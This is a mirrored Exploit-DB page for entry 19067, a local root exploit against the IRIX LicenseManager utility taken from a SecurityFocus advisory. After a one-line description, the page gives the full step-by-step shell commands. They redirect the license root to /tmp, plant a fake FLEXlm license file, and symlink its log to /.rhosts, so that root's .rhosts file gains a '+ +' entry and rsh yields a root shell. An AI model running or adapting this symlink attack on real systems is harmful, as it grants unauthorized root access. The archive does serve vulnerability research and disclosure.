bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/irix/local/19067.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

33 lines
No EOL
876 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/73/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access.
% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &
Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.
% cat /.rhosts
Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
% rsh localhost -l root
#
Reference in a new issue View git blame Copy permalink